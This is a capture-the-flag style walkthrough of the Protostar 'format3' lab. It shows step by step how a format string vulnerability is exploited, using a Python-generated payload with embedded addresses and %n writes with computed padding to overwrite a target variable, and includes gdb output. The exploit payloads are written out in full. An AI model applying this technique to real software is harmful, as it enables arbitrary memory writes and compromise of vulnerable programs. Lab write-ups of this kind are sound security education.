In the previous exercise we had to write a certain value into a memory address. That value was 64, which fits into 1 byte. In this exercise we have to write 0x01025544 into target. This can be accomplished if we write the value as two half-word. In this case we have to take care of the order we write the values.

First write:
–0x00 0x00 0x00 0x00 0x00 0x00
—————–0x00 0x00 0x55 0x44

After first write:
–0x00 0x00 0x00 0x00 0x55 0x44

Second write:
–0x00 0x00 0x00 0x00 0x55 0x44
–0x00 0x01 0x01 0x02

After second write:
0x00 0x01 0x01 0x02 0x55 0x44

We can increase the value we write, but the second write should be 0x0102. However we can solve this problem easily if we overflow the value and write 0x010102. In order to avoid confusion, I will write it as 0x(01)0102.

 

The address of target is 0x080496f4.

I placed the the two addresses at the beginning of the format string. The next two %12$x and %13$x prints out the addresses.

$ python -c ‘print “\xf4\x96\x04\x08\xf6\x96\x04\x08%12$x%13$x”‘ > /tmp/1

(gdb) r < /tmp/1

80496f480496f6

 

I replaced the x with n and placed a breakpoint after the printf function call.

$ python -c ‘print “\xf4\x96\x04\x08\xf6\x96\x04\x08%12$n%13$n”‘ > /tmp/1

(gdb) x/x 0x080496f4
0x80496f4 : 0x00080008

 

I modified the solution to write the correct value into the memory area. 0x01025544 can be splitted into 0x(01)0102 and 0x5544. 0x(01)0102 = 65794 and 0x5544 = 21828.
I wrote 8 bytes at the beginning of the format string. So the first value is 21828-8 = 21820.
The second value is 65794 – 8 – 21820 = 43966. 8 is the size of the addresses, 21820 is the %21820d.

$ python -c ‘print “\xf4\x96\x04\x08\xf6\x96\x04\x08%21820d%12$n%43966d%13$n”‘ > /tmp/1
$ cat /tmp/1 | /opt/protostar/bin/format3